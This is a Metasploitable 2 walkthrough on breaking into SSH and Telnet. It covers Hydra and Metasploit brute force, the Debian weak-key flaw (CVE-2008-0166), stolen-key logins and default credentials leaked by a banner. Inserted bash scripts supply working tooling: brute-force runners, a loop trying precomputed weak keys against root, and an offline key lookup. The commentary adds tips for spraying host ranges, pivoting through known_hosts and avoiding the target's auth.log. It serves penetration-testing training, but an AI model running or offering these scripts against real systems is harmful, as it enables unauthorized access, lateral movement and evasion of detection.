Metasploitable 2 Walkthrough: Part II

Exploiting Port 22 – SSH

First, a reminder of the information Nmap returned about the SSH service after a port scan:

Port 22 in port scan

The first challenge when brute-forcing SSH credentials is finding valid usernames. There are two ways to get them:

  • Guess them from the services the host runs (application and service accounts tend to have predictable names)
  • Read them from a file on the machine, typically /etc/passwd, through some other exposed service

It would be great if you could log in via SSH as root, but that is usually disabled (PermitRootLogin in sshd_config). To succeed, you need a list of the system's users. It can be obtained in many ways; two that abuse the database servers are covered later in the MySQL and PostgreSQL chapters, both of which show how to pull usernames or the contents of /etc/passwd with Metasploit.

Once you have the usernames, you can try to crack the passwords.

  • For password wordlists, use the ones shipped with Kali or SecLists by Daniel Miessler on GitHub: https://github.com/danielmiessler/SecLists
  • If you only have usernames, use Hydra to brute-force the login online against the service
  • If you have usernames and password hashes (for example from /etc/shadow), crack them offline with John the Ripper; that yields cleartext passwords without sending another login attempt to the target

Brute forcing SSH using Hydra

Once you have a list of usernames and a password wordlist, you can use Hydra as you did for the FTP service (the only change is the service in the target specification, ssh instead of ftp):

Brute force password with Hydra

Brute forcing SSH using Metasploit

Metasploit's auxiliary/scanner/ssh/ssh_login module tests SSH credentials against a range of hosts and reports successful logins. If msfconsole is connected to a database, it also stores the working credentials and hosts, so you can keep track of your access with the creds and hosts commands.

In addition, every successful login immediately opens a command shell session on the remote machine, which can then be upgraded to a Meterpreter session.

Brute forcing and getting a shell with MSF

And that command shell session was upgraded to a more powerful Meterpreter session (sessions -u <id> does this from msfconsole).
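As an added example (not from the original post), the two brute-force runs above as one script: Hydra against SSH, then a generated Metasploit resource script for ssh_login. The target address 192.168.56.101 and the file names users.txt and passwords.txt are assumptions; the resource-script function also works for the other *_login scanners (telnet_login, ftp_login) because they take the same USER_FILE and PASS_FILE options.

```shell
#!/usr/bin/env bash
# Added example, not from the original post. Assumes target 192.168.56.101
# and that users.txt / passwords.txt exist in the working directory.
set -euo pipefail

TARGET="${TARGET:-192.168.56.101}"
USERS="${USERS:-users.txt}"
PASSWORDS="${PASSWORDS:-passwords.txt}"

# Online SSH brute force with Hydra. Keep the task count low: OpenSSH's
# MaxStartups (default 10:30:100) starts dropping unauthenticated
# connections under load, which shows up as missed passwords, not errors.
# -e nsr additionally tries an empty password, username-as-password and the
# reversed username, which catches msfadmin:msfadmin without any wordlist.
run_hydra() {
    hydra -L "$USERS" -P "$PASSWORDS" -e nsr -t 4 -f -V \
          -o "hydra-ssh-${TARGET}.txt" "ssh://${TARGET}"
}

# Write a resource script for one of Metasploit's *_login scanner modules.
# $1 = module path (e.g. auxiliary/scanner/ssh/ssh_login), $2 = output file.
# workspace/creds need a connected database (msfdb init); without one
# msfconsole only warns and the remaining commands still run.
write_login_rc() {
    local module="$1" out="$2"
    cat > "$out" <<EOF
workspace -a metasploitable2
spool msf-${module##*/}.log
use $module
set RHOSTS $TARGET
set USER_FILE $USERS
set PASS_FILE $PASSWORDS
set STOP_ON_SUCCESS true
set THREADS 4
set VERBOSE false
run
creds
sessions -l
EOF
    printf '%s\n' "$out"
}

# Run the generated script. Every valid login leaves an open shell session,
# which you then upgrade by hand with:  sessions -u <id>
run_msf_ssh_login() {
    local rc
    rc=$(write_login_rc auxiliary/scanner/ssh/ssh_login ssh_login.rc)
    msfconsole -q -r "$rc"
}

if [ "${1:-}" = "--run" ]; then
    run_hydra
    run_msf_ssh_login
fi
```

Run it with --run once the wordlists are in place. STOP_ON_SUCCESS stops guessing for a user after the first hit, which is what you want on a lab box with one host; drop it when spraying a range where the same password may work on several machines.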

Brute forcing SSH using the RSA method

Hosts whose SSH keys were generated with the OpenSSL package shipped by Debian and its derivatives between September 2006 and May 2008 are open to a brute-force attack: a patch to that package left the process ID as the only real source of entropy for the random number generator (CVE-2008-0166). With only about 32,000 possible PIDs, every key pair such a system could have generated for a given key type, size and architecture can be precomputed, and that precomputed set is what the exploit uses. Searching Exploit-DB you will find several exploits for this weakness.

Try the one available at: http://www.exploit-db.com/exploits/5632/.

Before running it, download the precomputed vulnerable keys from:

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2

Extract the keys to a temporary folder and download the exploit script as well.

You can consult the source for more information, but basically the script tries every private key in the directory you point it at against the root account; a hit means the matching public key sits in root's authorized_keys. Run it and after a while it finds a key:

Testing RSA keys

Then use that key to log in as root via SSH:

SSH root login
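Two ways to use the precomputed key set, as an added example (not from the original post or the EDB 5632 script): an offline lookup that fingerprints a harvested public key and matches it against the set, and the online spray that the exploit performs. The key directory rsa/2048, the target 192.168.56.101 and the root login are assumptions. The fingerprint is the MD5 over the base64-decoded key blob, which is the value ssh-keygen -l -E md5 prints.

```shell
#!/usr/bin/env bash
# Added example, not from the original post or the EDB 5632 script.
# Assumptions: keys extracted to ./rsa/2048 as <name> (private) next to
# <name>.pub, target 192.168.56.101, login root, GNU coreutils available.
set -euo pipefail

KEYDIR="${KEYDIR:-rsa/2048}"
TARGET="${TARGET:-192.168.56.101}"
USER_NAME="${USER_NAME:-root}"
SSH_BIN="${SSH_BIN:-ssh}"   # overridable so the spray loop can be dry-run

# MD5 fingerprint of one OpenSSH public-key line. The hash covers the
# base64-decoded key blob (the field after the key type), which is exactly
# what "ssh-keygen -l -E md5" reports. Leading authorized_keys options such
# as from="..." are tolerated because the key type token is located first.
pubkey_md5() {
    local blob
    blob=$(printf '%s\n' "$1" \
        | grep -oE '(ssh-rsa|ssh-dss) [A-Za-z0-9+/=]+' | head -n1 | cut -d' ' -f2) || true
    [ -n "$blob" ] || return 1
    printf '%s' "$blob" | base64 -d | md5sum | cut -d' ' -f1
}

# Offline, step 1: index the fingerprint of every .pub in the set once.
# File names in the set contain no spaces, so "fingerprint path" per line is enough.
build_index() {
    local dir="$1" out="$2" f fp
    : > "$out"
    for f in "$dir"/*.pub; do
        [ -e "$f" ] || continue
        fp=$(pubkey_md5 "$(head -n1 "$f")") || continue
        printf '%s %s\n' "$fp" "${f%.pub}" >> "$out"
    done
}

# Offline, step 2: given a harvested public-key line (e.g. copied from a
# victim's authorized_keys), print the matching private key path and return 0
# if the key is in the weak set, 1 otherwise. One hash lookup instead of
# ~32,000 login attempts, and nothing is written to the target's auth.log.
lookup_weak_key() {
    local index="$1" fp
    fp=$(pubkey_md5 "$2") || return 1
    awk -v fp="$fp" '$1 == fp { print $2; found = 1 } END { exit !found }' "$index"
}

# Online: what the EDB script does. Try every private key against the account.
# BatchMode=yes refuses to fall back to a password prompt, so a rejected key
# fails instantly. Stop at the first key the server accepts.
spray_keys() {
    local f
    for f in "$KEYDIR"/*; do
        case "$f" in *.pub) continue ;; esac
        if "$SSH_BIN" -o BatchMode=yes -o StrictHostKeyChecking=no \
                -o ConnectTimeout=5 -i "$f" "${USER_NAME}@${TARGET}" true 2>/dev/null; then
            printf 'valid key: %s\n' "$f"
            return 0
        fi
    done
    return 1
}
```

The offline path is the one worth remembering: if you can read an authorized_keys or an id_rsa.pub from anywhere (a file share, a web root, the database dumps covered later), a single lookup tells you whether the key is weak, and the target never sees the thousands of failed logins the online spray generates.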

Brute forcing SSH using the Pubkey Method

If you manage to get hold of a private key, use Metasploit's auxiliary/scanner/ssh/ssh_login_pubkey module (KEY_PATH points at the key file, or at a directory of keys). It uses the private key to do two things:

  • Get access to the victim machine
  • Get access to any other machine that trusts that key, i.e. whose authorized_keys contains the matching public key; the victim's ~/.ssh/known_hosts is a good hint about which hosts to try

A private key can be obtained in many ways, and you already saw one of them (the weak Debian key above). Just make sure the key is saved in a text file in OpenSSH format so the module can read it.

Exploiting a public key with MSF

Success!

Exploiting Port 23 – Telnet

Telnet is a protocol (and client program) for remote terminal access. It is inherently insecure: everything, including the login credentials, crosses the network in clear text, so anyone who can sniff the traffic can read them.

Banner flaw

On the Kali box, open a terminal and telnet to the Metasploitable VM. The pre-login banner displays the default credentials (msfadmin/msfadmin), so no guessing is needed.

Telnet banner flaw

Exploiting Telnet with Metasploit

The auxiliary/scanner/telnet/telnet_login module tests Telnet logins against a range of hosts and reports successful ones. If msfconsole is connected to a database, it records the working credentials and hosts so you can track your access. The same username and password files from earlier are used here.

Brute force Telnet with MSF

And you will have another session.
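The banner check and the Telnet brute force as an added example (not from the original post): a banner grab over bash's /dev/tcp, which avoids the interactive telnet client and strips the option-negotiation bytes, followed by the telnet_login run. The target 192.168.56.101, the wordlist names and the three-second wait are assumptions.

```shell
#!/usr/bin/env bash
# Added example, not from the original post. Assumes bash (for /dev/tcp),
# coreutils timeout, target 192.168.56.101, and users.txt / passwords.txt.
set -euo pipefail

TARGET="${TARGET:-192.168.56.101}"
PORT="${PORT:-23}"
BANNER_WAIT="${BANNER_WAIT:-3}"   # seconds to wait for the banner

# A Telnet server opens with option negotiation: IAC (0xff) followed by two
# bytes, repeated, before any human-readable text. Keep tab, newline and
# printable ASCII only, so the banner is readable and safe to paste into notes.
strip_telnet_bytes() {
    tr -cd '\11\12\40-\176'
}

# Connect, read whatever arrives within BANNER_WAIT seconds, and clean it up.
# The pre-login banner is sent before the login prompt, so no credentials
# are needed to see it.
grab_banner() {
    exec 3<>"/dev/tcp/${TARGET}/${PORT}"
    timeout "$BANNER_WAIT" cat <&3 | strip_telnet_bytes || true
    exec 3>&-
}

# Same wordlists as for SSH; each valid login leaves an open session.
run_telnet_login() {
    msfconsole -q -x "use auxiliary/scanner/telnet/telnet_login; \
set RHOSTS ${TARGET}; set RPORT ${PORT}; \
set USER_FILE users.txt; set PASS_FILE passwords.txt; \
set STOP_ON_SUCCESS true; set VERBOSE false; run; sessions -l"
}

if [ "${1:-}" = "--run" ]; then
    grab_banner
    run_telnet_login
fi
```

Whatever the banner gives away, try it first: a credential printed by the service is found in one connection, while the brute force is only there for when the banner says nothing useful.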
